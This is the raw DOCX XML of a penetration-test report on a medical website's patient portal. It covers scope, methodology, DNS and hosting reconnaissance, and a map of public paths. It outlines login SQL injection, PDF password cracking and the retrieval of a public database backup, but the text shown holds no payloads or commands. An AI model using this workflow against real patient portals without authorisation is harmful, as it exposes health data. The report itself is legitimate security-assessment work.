                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Black-box</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exclusions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No social engineering; no denial of service; no outside-domain testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Data handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Minimum necessary acquisition for authorized milestones and evidence preservation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Auxiliary services were observed during network enumeration, including FTP, SMTP, DNS, POP3/IMAP and cPanel-related ports. Because the target appears to use shared hosting and the engagement boundary was the web domain, those services are treated as attack-surface observations rather than automatically as vulnerabilities. No independent exploitation of those services is claimed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>4. Methodology &amp; Assessment Workflow</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Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Activities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DNS, HTTP, robots.txt, sitemap, WHOIS, certificate and metadata review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DNS/HTTP outputs, screenshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attack-surface mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public pages, restricted directories, login endpoints, portal links</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTML, directory listings, screenshots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Authentication testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Baseline invalid login followed by controlled input mutation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP status/redirect differential, Burp evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Exploitation validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Browser confirmation, report enumeration and file retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Portal screenshots, PDF artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Cryptographic analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PDF metadata, encryption parameters, hash extraction, password recovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>qpdf output, hashes, crack evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Sensitive-data exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public backup retrieval and structured data analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Raw SQL, tables, exact statistics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Reporting/retest design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Risk classification, root cause, remediation and closure tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>This report and evidence matrix</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>Testing philosophy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The methodology prioritized proof over volume. A scanner result alone was not accepted as the final determination when the application could be tested manually. Conversely, the report does not upgrade an automated result into a confirmation when the tool did not independently validate the issue. This is especially important for the SQL injection finding: sqlmap encountered repeated HTTP 403 responses and connection instability, while the manual test produced a reproducible authentication-state change and browser-confirmed access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>5. Reconnaissance &amp; Attack-Surface Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>5.1 DNS and hosting identity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The target resolved consistently to 199.188.201.16 through both Cloudflare public resolvers tested in the captured commands. WHOIS data identified NameCheap registration/hosting context, while the service scan exposed a shared-hosting style service set. The hostname responded normally over HTTPS, whereas direct-to-IP requests produced different HTTP behavior; this is treated as routing/SNI/load-balancer behavior, not as a vulnerability by itself.</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7365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>A record</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>199.188.201.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>HTTP/2 200</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Content type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>text/html</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Server header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>LiteSpeed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Generator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mediroza CMS 1.4.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Author metadata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Mediroza IT Department</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TLS 1.3 observed; hostname certificate behavior recorded in scan evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>MX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>mx1/mx2/mx3-hosting.jellyfish.systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SPF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5112"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Includes +a, +mx, two hosting IPs and spf.web-hosting.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Public application map</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Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Observed role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
            <w:shd w:fill="17365D"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Security relevance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public homepage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Application identity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/about.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/doctors.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/contact.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Public contact information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/patient/login.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Patient authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Critical attack surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3408"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="20"/>
            </w:pPr>
